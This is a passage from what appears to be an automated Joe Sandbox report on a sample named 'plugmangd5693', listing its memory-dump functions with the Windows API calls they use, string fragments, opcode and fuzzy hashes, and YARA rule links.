Function 01D0223A, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,?,9385981B,00000000,?,?,?,?,?,?,?,?,73EE3C58), ref: 01D02277

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8535cbac7e5da5966d2dbefa90e4da343f8b474c830d7cbdfdf969fad2f46723
Instruction ID: fd450c67976610dffcecfebfd1eed50ca739c26be9b8101b6961cfc63cfe4877
Opcode Fuzzy Hash: 8535cbac7e5da5966d2dbefa90e4da343f8b474c830d7cbdfdf969fad2f46723
Instruction Fuzzy Hash: 4701F1326013008FEB12CF69DC89766FBD8EF04320F08C4AADD49CB382D274E404CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 01D0299E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 01D029D8

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: a4b21b316dc6a40184b335f3ea813221a2a133537be7c0cadc4416942b3aa8fb
Instruction ID: 9e96e990cce7312933bedcbcd276e5921d8cd1d9afdd5aad2fe2d7c43887486e
Opcode Fuzzy Hash: a4b21b316dc6a40184b335f3ea813221a2a133537be7c0cadc4416942b3aa8fb
Instruction Fuzzy Hash: 3701D431A013408FEB11CF6AE889766FBD8EF04320F08C4AADD0DCB682D674E544CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D02A52, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,9385981B,00000000,?,?,?,?,?,?,?,?,73EE3C58), ref: 01D02A8C

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: e753855c08952d544693343dccd15cfaa844a2c09b6ad9b1a4444f27747a499c
Instruction ID: 6dad7b2c7e1ec63a90d08c00a2b0a6e8cb29c75501cbc84f0f353f22c9618cb5
Opcode Fuzzy Hash: e753855c08952d544693343dccd15cfaa844a2c09b6ad9b1a4444f27747a499c
Instruction Fuzzy Hash: 9A017171A013409FEB21CF69D889766FBD8EF44720F08C4AADD49CB686DA74E584CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D0091E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 01D00969

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 5abb171e273324a864f74161d6e7daa739e2941a0d3c617da949f01562ec59f3
Instruction ID: 1700590d7f567afcadbeb7c875c28156f65191f93776cc50a52bf39878ea8636
Opcode Fuzzy Hash: 5abb171e273324a864f74161d6e7daa739e2941a0d3c617da949f01562ec59f3
Instruction Fuzzy Hash: FC019271500700AFFB61CF19E885B26FBE4EB08660F0CC499ED498B396D271E444CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D00032, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 01D00076

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: be31735f3b0ff39f0a0879eacbc705d0490769def7e34aa169ed1381a4dca101
Instruction ID: f8bba8956ce07d0786cb8cd003665488ea1e0b3171785bd84766190fa71f1ddf
Opcode Fuzzy Hash: be31735f3b0ff39f0a0879eacbc705d0490769def7e34aa169ed1381a4dca101
Instruction Fuzzy Hash: B7018431400700EFEB21CF55D844B65FFE0EF48760F08C9AAED894A652D275E414DF61

Uniqueness

Uniqueness Score: -1.00%

Function 01D00872, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

AddAtomW.KERNEL32(?), ref: 01D008AC

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: Atom
String ID:
API String ID: 2154973765-0
Opcode ID: 2282777c32f5cc1a904ac216397406eb5a171a458a54b7a97881ebfae61677d5
Instruction ID: 5cd6956fa1aecc35e4a3ba7c13f1bb9cd2a22dd722640119d55f1605b124f068
Opcode Fuzzy Hash: 2282777c32f5cc1a904ac216397406eb5a171a458a54b7a97881ebfae61677d5
Instruction Fuzzy Hash: 4001D471900340AFE711DF19D884766FBD4EB04260F08C4AAED498F286E278E504CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002FAD7E, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 002FADCE

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9350b1c3751bf520af99ab013748dc37958477238727508fc464a3ca2d32b78c
Instruction ID: 4f23d73a4cae722caae85887500624a214d49b0d39e4f3a39a87431207eab890
Opcode Fuzzy Hash: 9350b1c3751bf520af99ab013748dc37958477238727508fc464a3ca2d32b78c
Instruction Fuzzy Hash: DF01A271900601ABD310CF16DC42B26FBA8FB88B20F14815AED085B741D271F525CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 002FA2F6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000E40,?,?), ref: 002FA341

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: cae9f0c0925446f84098cd279bd52af64f24e9270f42811c3687de25c861d567
Instruction ID: 2e0bbb51f5934155620ba8eee3dafb25dd99fe7cc57a2bab2c2d82ee7ec1ca99
Opcode Fuzzy Hash: cae9f0c0925446f84098cd279bd52af64f24e9270f42811c3687de25c861d567
Instruction Fuzzy Hash: DA01A271900601ABD310CF16DC42B26FBA8FB88A20F148159ED085B741D275F515CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 01D01CA6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 01D01CF6

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: a5819c4614b1dd1d83247d98b0387a9ebc954f2c448aa44a5b78251f2d8b7a20
Instruction ID: d908baf236271dc0bc77ff7bf560687f2ff3d2c6b4266918fb70f0920b56e6eb
Opcode Fuzzy Hash: a5819c4614b1dd1d83247d98b0387a9ebc954f2c448aa44a5b78251f2d8b7a20
Instruction Fuzzy Hash: 6001A271900601ABD310CF16DC42B26FBA8FB88B20F14815AED085B741D271F525CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 01D030D2, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 01D0310D

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1b233c74765e5d3d2e181fa2a6e9460aa486b7243743d8a7a1d302698ead7aaf
Instruction ID: b6daf1fd4a64c124aa0f01486aeda42b1614cccedd4d21b271ba0f5bb4f48f1b
Opcode Fuzzy Hash: 1b233c74765e5d3d2e181fa2a6e9460aa486b7243743d8a7a1d302698ead7aaf
Instruction Fuzzy Hash: 5F01B1355007009FEB218F15D885B65FBA0FB08320F08C5AAED494B692D271E454DB62

Uniqueness

Uniqueness Score: -1.00%

Function 01D02F52, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 01D02F84

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: DestroyWindow
String ID:
API String ID: 3375834691-0
Opcode ID: 84323e4c38e0209247c5ed64509a2c1214e063dc22de6343262e41f09fd7ac2d
Instruction ID: 20fbff74e91362c1a2ae5b46712762ea7c3cc1f95fbe1015c1c84f4305cd4017
Opcode Fuzzy Hash: 84323e4c38e0209247c5ed64509a2c1214e063dc22de6343262e41f09fd7ac2d
Instruction Fuzzy Hash: 3C01D1365013008FE7128F1AE889765FFA4EB04720F08C0EEDD498B792D271E458CA62

Uniqueness

Uniqueness Score: -1.00%

Function 01D02D4A, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 01D02D85

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ec1d6efa4eda4cc61f87ec409e0f697fa28b37f484d523d0c00b0cdfd39e8686
Instruction ID: e6d33fa072feb7517f6a0477d0f250020285522cafbc7c2547283b08e615f78d
Opcode Fuzzy Hash: ec1d6efa4eda4cc61f87ec409e0f697fa28b37f484d523d0c00b0cdfd39e8686
Instruction Fuzzy Hash: 0001A235401740DFEB22CF49D888B65FFA0EF08320F08C49ADD490B656D275E854DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 002FAAC6, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,9385981B,00000000,?,?,?,?,?,?,?,?,73EE3C58), ref: 002FAAF8

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 535a94c6f82f1dddb148cb6b3dba5781ffc51edd915cf75b797480ca994db48d
Instruction ID: 3c8c9a1df953d78d1c556654f591ad0baf4fe574a2848614634b1000035dc13d
Opcode Fuzzy Hash: 535a94c6f82f1dddb148cb6b3dba5781ffc51edd915cf75b797480ca994db48d
Instruction Fuzzy Hash: AAF0F9715203088FEB20CF05D889731FBA0EB00760F08C0EADE0D4B316D2B5A898CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 002FB011, Relevance: 1.4, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 002FB0E8

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6eb80ceb3001ad35403d7845bc31dcf2963c16efec0473b84417c8a017cae39d
Instruction ID: be92e5ab7ccc297f02733b390513a87cac23b3f058c2bb8ffccc3e8c9c0e2d85
Opcode Fuzzy Hash: 6eb80ceb3001ad35403d7845bc31dcf2963c16efec0473b84417c8a017cae39d
Instruction Fuzzy Hash: F63106725493C06FD7128B25DC55B62BFB8DF42220F0D84EBED848F693C265A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0030A95B, Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

sUS, xrefs: 0030A978

Memory Dump Source

Source File: 00000004.00000002.424767712.0000000000302000.00000040.00000001.sdmp, Offset: 00302000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_302000_plugmangd5693.jbxd

Similarity

API ID:
String ID: sUS
API String ID: 0-1212579360
Opcode ID: 7732c3b9b4df3f863199466fde9cf019ae53b9cb0f0b18a0590ed50801d88c9d
Instruction ID: 592d10bc0a828c03689b48ca9740e5c8fec21aeefec8b8c31dbeb71557beb7b7
Opcode Fuzzy Hash: 7732c3b9b4df3f863199466fde9cf019ae53b9cb0f0b18a0590ed50801d88c9d
Instruction Fuzzy Hash: AC31B1B6509340AFD310CF05EC41A56FFE8EB85620F18C86FFD4897212E235A908CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0030AA87, Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

sUS, xrefs: 0030AAA4

Memory Dump Source

Source File: 00000004.00000002.424767712.0000000000302000.00000040.00000001.sdmp, Offset: 00302000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_302000_plugmangd5693.jbxd

Similarity

API ID:
String ID: sUS
API String ID: 0-1212579360
Opcode ID: a8e03f474c4df4603485f7d13322ea1e4718274bcaf506b2650fe38a961a4368
Instruction ID: 7e0db47a7252aa9077dd536eefb9fb0e6ee45ce7533164b0e5e9e1ba4dff0cf8
Opcode Fuzzy Hash: a8e03f474c4df4603485f7d13322ea1e4718274bcaf506b2650fe38a961a4368
Instruction Fuzzy Hash: A5318EB6509340AFD311CF05EC41A57FBE8EB85630F18C86EFD599B212E235A904CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0030ABB8, Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

sUS, xrefs: 0030ABD0

Memory Dump Source

Source File: 00000004.00000002.424767712.0000000000302000.00000040.00000001.sdmp, Offset: 00302000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_302000_plugmangd5693.jbxd

Similarity

API ID:
String ID: sUS
API String ID: 0-1212579360
Opcode ID: 76dc7617c02cad9762d48a4d95027ba306ada5605e495deae2ec454b8f52f280
Instruction ID: b7893901b743b154232402cfc6a0986f09d3df830be2ffe5ddf42b14ef215120
Opcode Fuzzy Hash: 76dc7617c02cad9762d48a4d95027ba306ada5605e495deae2ec454b8f52f280
Instruction Fuzzy Hash: 1A2193B6509340AFD310CF15EC41A57FFE9EB85630F18C86EFD589B212D235A904CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 006FA258, Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

GO^, xrefs: 006FA279

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: GO^
API String ID: 0-3835302058
Opcode ID: 62e96f9d9a29f7288f64babd9c7dbcbf5da38d03f69619afb352a908ea419493
Instruction ID: dab94c7aabf25ba13d6437543e440daf025ea163ab57ea2822c4b157a5cff9e0
Opcode Fuzzy Hash: 62e96f9d9a29f7288f64babd9c7dbcbf5da38d03f69619afb352a908ea419493
Instruction Fuzzy Hash: 4B411D74901349EFEB44DFA4E8889ADBBF6FB88304F10A559D409AB358DB74AD41CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0030A618, Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

sUS, xrefs: 0030A634

Memory Dump Source

Source File: 00000004.00000002.424767712.0000000000302000.00000040.00000001.sdmp, Offset: 00302000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_302000_plugmangd5693.jbxd

Similarity

API ID:
String ID: sUS
API String ID: 0-1212579360
Opcode ID: 12fb3fe886da31ac7e32944eaf2dc15a2b8fb965183110a35733eb38a0a44a0e
Instruction ID: 518953d38b568983e1ec27b729aef0d775d4ea50a7c74e6a6f34159550b6e070
Opcode Fuzzy Hash: 12fb3fe886da31ac7e32944eaf2dc15a2b8fb965183110a35733eb38a0a44a0e
Instruction Fuzzy Hash: 5921C176505340AFD3118F46EC41E57FFE9EB85630F09C8AAFD499B212D275A804CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 006FD2D9, Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

p|, xrefs: 006FD30D

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: p|
API String ID: 0-2006446243
Opcode ID: 4973fa39fba49223e5ebd6b6669af43b23c2e5e7b6216435373c6d63bceb617d
Instruction ID: 9ba043dfb6732951171f0b10b345ed5115772f5cc145eb99d68ede78af6132f9
Opcode Fuzzy Hash: 4973fa39fba49223e5ebd6b6669af43b23c2e5e7b6216435373c6d63bceb617d
Instruction Fuzzy Hash: 11312774D04319DFDB54CFA0D984BADBBB2FF49310F20A49AE50AA7250DB34AA80DF15

Uniqueness

Uniqueness Score: -1.00%

Function 006F3959, Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

`^0, xrefs: 006F3A25

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: `^0
API String ID: 0-3044495940
Opcode ID: d44418120ed5502deed3c6d894c0797c6f8d667482fe00f40ba35cd8271908f2
Instruction ID: 71cc425f5d46b3cf5a0e950afa685b0fe7c0e03012f2029b4d610b40e9825ea6
Opcode Fuzzy Hash: d44418120ed5502deed3c6d894c0797c6f8d667482fe00f40ba35cd8271908f2
Instruction Fuzzy Hash: EC2115B4D042189FCB05DFA9C984AEEBBF2BF89300F1480AAD944B7351D7305A44DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 006F3968, Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

`^0, xrefs: 006F3A25

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: `^0
API String ID: 0-3044495940
Opcode ID: 696e0029559a2f33a9a092acea82229371410c689faf0f94971c855397ae4164
Instruction ID: 03ec2114a6c575151fe5fae7fb00becddf0160e30fde995dbf6adbbe5889cef9
Opcode Fuzzy Hash: 696e0029559a2f33a9a092acea82229371410c689faf0f94971c855397ae4164
Instruction Fuzzy Hash: AB21D474D00219DFDB04DFA9D484AEEBBF6BB88300F209069D914B7350D7309A44DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 006F7A12, Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

O$Y, xrefs: 006F7A86

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: O$Y
API String ID: 0-3116055085
Opcode ID: e01615357b175a93218ecbeb88bbf34c402a9d1275f40fa854697f1443a40e47
Instruction ID: a88c8d842ed77e972ed636c1fba38b5aba413a389b516aa3c57edf2be2079c4d
Opcode Fuzzy Hash: e01615357b175a93218ecbeb88bbf34c402a9d1275f40fa854697f1443a40e47
Instruction Fuzzy Hash: CE218E30909249DFDB04CFA9C8809AEFBF2FF89300F15D5A6D025AB220D6349B01DF41

Uniqueness

Uniqueness Score: -1.00%

Function 002FB0B6, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 002FB0E8

Memory Dump Source

Source File: 00000004.00000002.424745166.00000000002FA000.00000040.00000001.sdmp, Offset: 002FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fa000_plugmangd5693.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 61a4767ee1b36b2214874fa364ab34441151dad1b561c143d633e37dbb88f40c
Instruction ID: e550d8d8f27401f7fb3e0976007c6fa5421867a02570f34e4fc6cef5c9130c08
Opcode Fuzzy Hash: 61a4767ee1b36b2214874fa364ab34441151dad1b561c143d633e37dbb88f40c
Instruction Fuzzy Hash: 1901DF359103448FEB10CF15D884776FBA4EF00360F18C4BADD0D8B242D274E854CA61

Uniqueness

Uniqueness Score: -1.00%

Function 006F4EA8, Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

R]4q, xrefs: 006F4E3C

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: R]4q
API String ID: 0-3087800203
Opcode ID: 99fdbc2cd63fda309a77a3d5289ed1a82e663524e174ca23c003c6369e59b96f
Instruction ID: 26ccc390c888a7bf3ff2481f215d45a505e33665358cb7311132fcca9c474822
Opcode Fuzzy Hash: 99fdbc2cd63fda309a77a3d5289ed1a82e663524e174ca23c003c6369e59b96f
Instruction Fuzzy Hash: B4F04F70D1926D9EDB90CF54C881BAFBBB2FB52300F11159A9645AA210D7345E458F15

Uniqueness

Uniqueness Score: -1.00%

Function 006F0070, Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

`^0, xrefs: 006F0091

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: `^0
API String ID: 0-3044495940
Opcode ID: 80057a1a5b7a873277b62ebedc721229e645f08902b1df627f5a6221b2a56e4d
Instruction ID: 123bf52a0042f9987da06ee5b4cda83f2b35737258d01d5c97126defa343b1a5
Opcode Fuzzy Hash: 80057a1a5b7a873277b62ebedc721229e645f08902b1df627f5a6221b2a56e4d
Instruction Fuzzy Hash: D6E08630943108DBDB05FBB8C66667EB26ADF86340F006A6D940513381CE716F10D695

Uniqueness

Uniqueness Score: -1.00%

Function 006F4E37, Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

R]4q, xrefs: 006F4E3C

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: R]4q
API String ID: 0-3087800203
Opcode ID: 2ceb4f5286afc276e7a8169b87bc1f2550fc69885cd54815661a52ab1b3755a4
Instruction ID: 2e02dc8a4343a1974825a4f8e81909444d092e8ae28ae1135eface167baee9e1
Opcode Fuzzy Hash: 2ceb4f5286afc276e7a8169b87bc1f2550fc69885cd54815661a52ab1b3755a4
Instruction Fuzzy Hash: D1E0C974E0026D8FDB60CF58C851B9FF7B2BB46300F1055A99648A7204D7305D448F16

Uniqueness

Uniqueness Score: -1.00%

Function 006FD218, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6a5889e6dbdd8f2cd9236434dac55191bbb6ed211548afa6b72d746af9fe0b
Instruction ID: a07af3228a12066516e9aeb67dd359c3c6ffa6e110f68e5da74436ba286c70b6
Opcode Fuzzy Hash: be6a5889e6dbdd8f2cd9236434dac55191bbb6ed211548afa6b72d746af9fe0b
Instruction Fuzzy Hash: 7C4135B0D01218DFEB14CFA1D8847AEBBB2FF49304F109199E909B7250DB34AA84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 006F3A48, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 532542ed8e9e2ab90010646d5e221bb9812b878964b6b209d57ab53579066417
Instruction ID: f7a55fb8cf3c4a452c927ffd83b7db1cee254b5536dbad0ab20a5fefc66e1474
Opcode Fuzzy Hash: 532542ed8e9e2ab90010646d5e221bb9812b878964b6b209d57ab53579066417
Instruction Fuzzy Hash: 8341D5B4E01208DFEF04DFA5D894AAEFBB2BF88300F248029E905A7390DB355941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 006FB02D, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef63a4bbea30cee8da94321771644789c8503a40ed13dbac81f925d76efaa6f4
Instruction ID: cb1988cc16b69a3c666d1b583c41f3c15996a6c45a92b25fff341cc347537f5f
Opcode Fuzzy Hash: ef63a4bbea30cee8da94321771644789c8503a40ed13dbac81f925d76efaa6f4
Instruction Fuzzy Hash: 9C318174D092898FCB05CFB5DA650AEFFB2BF4A200F1895EBC844A7355C7344A02DB42

Uniqueness

Uniqueness Score: -1.00%

Function 0030AD38, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.424767712.0000000000302000.00000040.00000001.sdmp, Offset: 00302000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_302000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f0f4f02845a29d5f54d853441238b19a6c19f4c927f1fbbb5c9361169e4f5c
Instruction ID: 38e4af1878b171193924aa28bc9f426fcb49cd804514fb3355ec3350011e47ad
Opcode Fuzzy Hash: 99f0f4f02845a29d5f54d853441238b19a6c19f4c927f1fbbb5c9361169e4f5c
Instruction Fuzzy Hash: 6A3149B550E3805FD302CF259850A56BFF4EB8A614F0888DEF8C8DB253D275A909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0030A400, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.424767712.0000000000302000.00000040.00000001.sdmp, Offset: 00302000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_302000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38a7caf3d7afb4bbbe69dc7c0d1b66dc87147f5c54d3005492c505b0ec28cbf5
Instruction ID: 64ed715d9db9f1da36e88c3b4730a7aef03922a1574b7e1e2e76b1238f67ee7c
Opcode Fuzzy Hash: 38a7caf3d7afb4bbbe69dc7c0d1b66dc87147f5c54d3005492c505b0ec28cbf5
Instruction Fuzzy Hash: B22107725053007FD3108F06AC41E63FFA8EB85A70F09C8AEFD089B252D236A804CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 006FD376, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1437f37f04437ed796463f1df1f46d19a98a4e626344a31996486a88ee84e2b
Instruction ID: f3e925f9c3e7170301910009f1f33ac48c76d016e8f279459ee38524c01a1a97
Opcode Fuzzy Hash: e1437f37f04437ed796463f1df1f46d19a98a4e626344a31996486a88ee84e2b
